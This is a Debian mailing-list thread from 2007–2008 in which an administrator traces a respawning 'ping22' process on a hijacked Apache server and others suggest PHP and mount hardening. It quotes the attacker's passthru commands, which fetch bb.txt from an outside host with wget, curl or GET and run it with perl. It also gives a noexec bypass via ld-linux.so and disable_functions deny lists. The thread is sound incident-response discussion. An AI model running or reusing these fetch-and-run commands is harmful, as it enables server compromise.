Re: ping22: can not kill this process

2008-01-05 Thread Rick Moen
Quoting Luis Mondesi ([EMAIL PROTECTED]): > Good one! LOL > > spilling ugly db*connect() errors to the world to see is not very > secure indeed. or how about: foo() could not open /etc/my-secret-users > file Which is of course why you also want these in php.ini: log_errors = On error_log =

Re: ping22: can not kill this process

2008-01-05 Thread Luis Mondesi
On 5 Jan 2008 16:33:07 GMT, Paul Hink <[EMAIL PROTECTED]> wrote: > Thomas Hochstein <[EMAIL PROTECTED]> wrote: > > > Raphael Geissert schrieb: > > > >>> disable_functions = dl, phpinfo, system, mail, include, shell_exec, > >>> exec, > >> > >> include()? I don't want to imagine how many scripts will

Re: ping22: can not kill this process

2008-01-05 Thread Paul Hink
Thomas Hochstein <[EMAIL PROTECTED]> wrote: > Raphael Geissert wrote: > >>> disable_functions = dl, phpinfo, system, mail, include, shell_exec, >>> exec, >> >> include()? I don't want to imagine how many scripts will break. > > A script that doesn't run is a *very* secure script. That depends o

Re: ping22: can not kill this process

2008-01-05 Thread Thomas Hochstein
Raphael Geissert wrote: >> disable_functions = dl, phpinfo, system, mail, include, shell_exec, exec, > > include()? I don't want to imagine how many scripts will break. A script that doesn't run is a *very* secure script. -thh -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of

Re: ping22: can not kill this process

2008-01-04 Thread Bernd Eckenfels
In article <[EMAIL PROTECTED]> you wrote: > Ah, I see. I have never come across a program (yet) that uses it for > shared memory. Perhaps I'm just running the wrong programs. The program itself is not using it, it's glibc2.2 which does use that (for POSIX shm, I think not for SYSV. so it's quite s

Re: ping22: can not kill this process

2008-01-04 Thread Hubert Chathi
On Fri, 04 Jan 2008 22:30:18 +0100 Bernd Eckenfels <[EMAIL PROTECTED]> wrote: > why do you think it is named shm? it is used for shm_open and > shm_unlink. > (where glibc used temporary files to mmap them) Ah, I see. I have never come across a program (yet) that uses it for shared memory. Perha

Re: ping22: can not kill this process

2008-01-04 Thread Bernd Eckenfels
In article <[EMAIL PROTECTED]> you wrote: >> It is for example used to map shared memory. ... > > No, it is a tmpfs directory for temporary files. It has nothing to do > with shared memory. why do you think it is named shm? it is used for shm_open and shm_unlink. (where glibc used temporary file

Re: ping22: can not kill this process

2008-01-04 Thread Hubert Chathi
On Fri, 04 Jan 2008 08:23:45 +0100 Bernd Eckenfels <[EMAIL PROTECTED]> wrote: > >what kind of applications are using /dev/shm? I googled > > around, seem not to find much information. > > right now I mount it as rw,noexec,nosuid. > > It is for example used to map shared memory. ... No, it is a t

Re: ping22: can not kill this process

2008-01-04 Thread Rick Moen
Quoting Raphael Geissert ([EMAIL PROTECTED]): > include()? I don't want to imagine how many scripts will break. Good catch. (It was very late in my time zone. I need to review that list.)

Re: ping22: can not kill this process

2008-01-04 Thread Raphael Geissert
Rick Moen wrote: > > disable_functions = dl, phpinfo, system, mail, include, shell_exec, exec, include()? I don't want to imagine how many scripts will break. Cheers, -- Atomo64 - Raphael Please avoid sending me Word, PowerPoint or Excel attachments. See http://www.gnu.org/philosophy/no-word-a

Re: ping22: can not kill this process

2008-01-04 Thread Marcin Owsiany
On Thu, Jan 03, 2008 at 08:55:11PM -0500, Luis Mondesi wrote: > And besides, noexec can't even > stop executables anyway. That's the stupidest of flags for mount: > > $> /lib/ld-linux.so.2 /usr/bin/printf "%s\n" foo > foo I think some of the newer dynamic loaders do check noexec and refuse to cir

Re: ping22: can not kill this process

2008-01-04 Thread Rick Moen
Quoting Javier Fernandez-Sanguino ([EMAIL PROTECTED]): > Even better: /usr/share/doc/php5-common/examples/php.ini-paranoid > (it includes some more functions in that definition) Excellent. Amended to: disable_functions = dl, phpinfo, system, mail, include, shell_exec, exec, escapeshellarg, esc

Re: ping22: can not kill this process

2008-01-04 Thread Javier Fernandez-Sanguino
2008/1/4, Rick Moen <[EMAIL PROTECTED]>: > Quoting Luis Mondesi ([EMAIL PROTECTED]): > > > It's time to tell PHP (via php.ini) not to allow any of those > > functions that allow executing stuff from the system (system, > > passthru, whatever). > > Amen to that. Good starting point: > disable_func

Re: ping22: can not kill this process

2008-01-04 Thread Steve Kemp
On Fri Jan 04, 2008 at 06:04:50 -0200, Felipe Figueiredo wrote: > Anybody has a clue as to why this default was chosen, and not the safest one? Too many broken PHP applications? Anyway please see /usr/share/doc/php4-common/examples/ for different examples. (Or /usr/share/doc/php5-common/e

Re: ping22: can not kill this process

2008-01-04 Thread Felipe Figueiredo
On Friday 04 January 2008 04:46:48 Rick Moen wrote: > Looking at the typical php.ini is faintly terrifying, starting with the > almost invariably ignored warning comments at the top, saying these > settings are for development environments only, and should never be > exposed to public networks.

Re: ping22: can not kill this process

2008-01-03 Thread Bernd Eckenfels
In article <[EMAIL PROTECTED]> you wrote: > I found the issue, it is one of the php scripts allowing the > remote script to run. This is a typical Apache exploit where remote file uploads are possible. > passthru('cd /tmp;wget http://www.radiovirtual.org/bb.txt;perl > bb.txt;rm -f bb.txt*');

Re: ping22: can not kill this process

2008-01-03 Thread Rick Moen
Quoting Luis Mondesi ([EMAIL PROTECTED]): > It's time to tell PHP (via php.ini) not to allow any of those > functions that allow executing stuff from the system (system, > passthru, whatever). Amen to that. Good starting point: disable_functions = system, exec, passthru, popen, escapeshellcmd,

Re: ping22: can not kill this process

2008-01-03 Thread Mike Wang
Hi Luis You are absolutely right!! Just tried a test script at /tmp, it is running. So there is not much point in mounting /tmp and /dev/shm as non-exec. My misunderstanding of non-exec has been there for a while. :( thanks a lot. Mike On Jan 3, 2008 8:55 PM, Luis Mondesi <[EMAIL PR

Re: ping22: can not kill this process

2008-01-03 Thread Luis Mondesi
On Jan 3, 2008 6:18 PM, Mike Wang <[EMAIL PROTECTED]> wrote: > Hi folks [snip] > http://www.radiovirtual.org/bb.txt > bb.txt;perl bb.txt;rm -f bb.txt*'); > passthru('cd /dev/shm;GET http://www.radiovirtual.org/bb.txt > > bb.txt;perl bb.txt;rm -f bb.txt*'); > passthru('id'); > ?> > > the /tmp wa

Re: ping22: can not kill this process

2008-01-03 Thread Mike Wang
Hi folks I found the issue, it is one of the php scripts allowing the remote script to run. and the remote script is something like: http://www.radiovirtual.org/bb.txt;perl bb.txt;rm -f bb.txt*'); passthru('cd /tmp;curl -o bb.txt http://www.radiovirtual.org/bb.txt;perl bb.txt;rm -f

Re: ping22: can not kill this process

2008-01-01 Thread Mike Wang
Hi Luis: thanks. > > Did you check to see whether /usr/sbin/apache2 was modified? Or was it > only the running process that had somehow been stack-overflow'd? > I checked the apache using debsums seems ok. shopping:/usr/sbin# debsums apache2-mpm-prefork /usr/sbin/apache2 OK /usr

Re: ping22: can not kill this process

2008-01-01 Thread Luis Mondesi
On Jan 1, 2008 7:10 PM, Mike Wang <[EMAIL PROTECTED]> wrote: > Hi Jan > thanks a lot. Happy new year to all! Happy new year to all as well! > I checked cron/at job, nothing related to ping22. > > And I checked my previous kill -9 ( see the previous post), it was > generated like th

Re: ping22: can not kill this process

2008-01-01 Thread Mike Wang
Hi Jan thanks a lot. Happy new year to all! I checked cron/at jobs, nothing related to ping22. And I checked my previous kill -9 (see the previous post), it was generated like the following: shopping:~# ps -ef | grep ping www-data 6455 1 29 20:53 ?00:07:53 ping222x sh

Re: ping22: can not kill this process

2007-12-31 Thread Jan Luehr
Hello, On Monday, 31 December 2007 Mike Wang wrote: > hi > Now this ping2 comes back, this time as ping222x. Yah it must come in > by exploiting perl or php cgi. the running user is www-data. > This implies some things (likely): 1. The system (as a whole) has not been compromised. All corr

Re: ping22: can not kill this process

2007-12-30 Thread Mike Wang
hi Now this ping2 comes back, this time as ping222x. Yah it must come in by exploiting perl or php cgi. the running user is www-data. shopping:~# ps -ef | grep ping www-data 766 1 31 19:35 ?00:24:46 ping222x root 6419 31632 0 20:53 pts/100:00:00 grep ping shopping:~# k

Re: ping22: can not kill this process

2007-12-30 Thread Bernd Eckenfels
In article <[EMAIL PROTECTED]> you wrote: > www-data 16848 1 14 14:01 ?00:06:07 ping22 Looks like it is started from Apache, most likely a CGI. Have a look at the CWD of that process or look into the access log. Regards Bernd

Re: ping22: can not kill this process

2007-12-30 Thread Bill Marcum - New Address!
On Sun, Dec 30, 2007 at 02:59:33PM -0500, Mike Wang wrote: > Hi > Recently one of my web servers was invaded by something called ping22. > it obviously exploited some perl cgi or php holes on this apache2 server. > But I do not know how it got exploited. > > (1) tried to kill -9 it, it is resp

Re: ping22: can not kill this process

2007-12-30 Thread Mike Wang
Hi Edwin Sorry I forgot to reply-all. thanks a lot for the detailed information. chkrootkit/rkhunter seem ok, only three of them not ok: shopping:/proc# chkrootkit shopping:/proc# rkhunter --checkall --skip-keypress * Application version scan - Exim MTA 3.36

Re: ping22: can not kill this process

2007-12-30 Thread Török Edwin
Mike Wang wrote: > Hi > Recently one of my web servers was invaded by something called > ping22. it obviously exploited some perl cgi or php holes on this > apache2 server. But I do not know how it got exploited. > > (1) tried to kill -9 it, it respawns again automatically. > respawn by who

ping22: can not kill this process

2007-12-30 Thread Mike Wang
Hi Recently one of my web servers was invaded by something called ping22. it obviously exploited some perl cgi or php holes on this apache2 server. But I do not know how it got exploited. (1) tried to kill -9 it, it respawns again automatically. # ps -ef | grep ping22 www-data 16848 1 1